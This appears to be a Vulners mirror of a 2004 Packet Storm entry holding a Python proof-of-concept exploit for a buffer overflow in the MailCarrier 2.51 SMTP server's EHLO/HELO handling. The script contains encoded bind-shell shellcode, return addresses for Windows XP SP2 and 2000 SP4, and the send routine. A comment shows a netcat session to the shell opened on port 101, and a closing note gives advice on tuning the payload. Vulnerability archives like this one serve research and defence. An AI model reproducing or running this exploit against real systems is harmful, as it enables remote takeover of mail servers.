Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mailcarrier.txt

🗓️ 27 Oct 2004 00:00:00Reported by mutsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

MailCarrier is a secure mail server supporting SSL and anti-spam with multi-domain capabilities.

Code
`  
  
ABOUT :  
  
MailCarrier is a full-featured mail server with the latest security and anti-spam functions. It supports SSL communication and SMTP/POP3 authentication methods based on SASL and NTLM that do not transmit message and/or password in clear text. Many spam mails can be blocked through inquiry of sender's address, inquiry of RBL, filtering of message content, and so on.  
MailCarrier provides you with various methods for running multiple domains. It can execute a mail server instance per domain in a single computer; you can run lots of mail servers without interference each other. In addition, you can make many virtual domains and alias domains per mail server instance as you want. For each domain and instance, you can build individual spam policy and security policy.  
  
http://www.tabslab.com/en/product/mailcarrier20/  
  
  
THE POC :  
  
#########################################################  
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #  
# Advanced, secure and easy to use FTP Server. #  
# 23 Oct 2004 - muts #  
#########################################################  
# D:\BO>mailcarrier-2.5-EHLO.py #  
#########################################################  
# D:\data\tools>nc -v 192.168.1.32 101 #  
# localhost [127.0.0.1] 101 (hostname) open #  
# Microsoft Windows 2000 [Version 5.00.2195] #  
# (C) Copyright 1985-2000 Microsoft Corp. #  
# C:\WINNT\system32> #  
#########################################################  
  
import struct  
import socket  
  
print "\n\n###############################################"  
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"  
print "\nFound & coded by muts [at] whitehat.co.il"  
print "\nFor Educational Purposes Only!\n"   
print "\n\n###############################################"  
  
def make_overflow_dummy(overflow_len, retaddr):  
return 'A' * overflow_len + struct.pack('<L', retaddr)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
sc2 = "\xEB"  
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"  
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"  
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"  
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"  
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"  
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"  
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"  
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"  
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"  
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"  
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"  
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"  
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"  
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"  
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"  
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"  
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"  
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"  
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"  
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"  
sc2 += "\x58\x68\x61\x63\x6B\x90"  
  
# Change RET address as need be.  
  
#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2 # RET Win2000 SP4 ENG  
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2 #RET WinXP SP2 ENG  
  
try:  
print "\nSending evil buffer..."  
s.connect(('127.0.0.1',25))  
s.send('EHLO ' + buffer + '\r\n')  
data = s.recv(1024)  
s.close()  
print "\nDone! Try connecting to port 101 on victim machine."  
except:  
print "Could not connect to SMTP!"  
  
  
INFOS :  
  
It works as is, but you might want to change the part after the EIP to NOPs in the following way...just for esthetics sake:  
  
buffer = make_overflow_dummy(5097, 0x7d17dd13) + 'x90' * 32 + sc2 #RET WinXP SP2 ENG  
  
  
  
Regards to muts & the whitehat's folks  
Jerome ATHIAS  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Oct 2004 00:00Current
7.4High risk
Vulners AI Score7.4
mail serversecurity featuresanti-spam functionsssl communicationmulti-domain supportbuffer overflow
25